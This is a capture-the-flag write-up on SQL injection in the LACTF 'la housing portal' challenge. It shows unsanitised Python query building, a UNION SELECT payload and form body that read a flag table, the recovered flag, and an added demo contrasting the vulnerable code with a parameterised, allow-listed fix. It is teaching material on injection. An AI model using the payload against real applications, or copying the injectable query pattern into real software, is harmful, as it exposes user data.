SQL Injection: Retrieve Data from Another Table

From LACTF "la housing portal":
serv.zip

#sqli

Quick Identification

We know the user input is not sanitized before it is placed into the SQL query:

query = """
    select * from users where {} LIMIT 25;
    """.format(
        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()])
    )

We can control both k and v because they come from the request form.

Payload

We can get the flag using UNION. Here is the payload:

' UNION SELECT 1,1,1,1,1,flag FROM flag where '

So the full form body sent with requests.post will be:

name=any&guests=' UNION SELECT 1,1,1,1,1,flag FROM flag where '1

Quick explanation

So the full query will be:

select * from users where name = 'any' AND guests = '' UNION SELECT 1,1,1,1,1,flag FROM flag where '1' LIMIT 25;


The payload works.

Let's get the flag:

Obtained flag : lactf{us3_s4n1t1z3d_1npu7!!!}
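
The query construction above, next to a fixed version, as an added example (not code from the challenge or from this write-up). It runs the form body shown earlier through both builders against an in-memory SQLite database; the table layout, column names, sample row and placeholder flag are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed schema: users has six columns (matching the six-column UNION
    # on the page) and flag has one row. Names and values are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT, guests TEXT,
                            neatness TEXT, sleep TEXT, awake TEXT);
        INSERT INTO users VALUES (1, 'alice', 'No guests', 'Tidy', '10pm', '6am');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed-placeholder}');
    """)
    return db

# Only these column names may appear in a search (hypothetical allow-list).
ALLOWED_COLUMNS = {"name", "guests", "neatness", "sleep", "awake"}

def search_vulnerable(db, prefs):
    # Same string formatting as the challenge code: keys and values are
    # spliced directly into the SQL text.
    query = "select * from users where {} LIMIT 25;".format(
        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()]))
    return db.execute(query).fetchall()

def search_hardened(db, prefs):
    if not prefs:
        raise ValueError("at least one filter is required")
    # Identifiers cannot be bound as parameters, so keys are checked
    # against the allow-list before they reach the SQL text.
    for k in prefs:
        if k not in ALLOWED_COLUMNS:
            raise ValueError("unexpected column: %r" % k)
    where = " AND ".join("{} = ?".format(k) for k in prefs)
    # Values are bound with placeholders and are never parsed as SQL.
    query = "select * from users where {} LIMIT 25;".format(where)
    return db.execute(query, list(prefs.values())).fetchall()

# The form body from the page, as parsed key/value pairs.
PAGE_FORM = {"name": "any",
             "guests": "' UNION SELECT 1,1,1,1,1,flag FROM flag where '1"}

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAGE_FORM))  # row from flag table
    print("hardened:  ", search_hardened(db, PAGE_FORM))    # no rows
```

In the hardened version the guests value is compared as a literal string, so the UNION never becomes part of the statement, and a key outside the allow-list is rejected before any query runs.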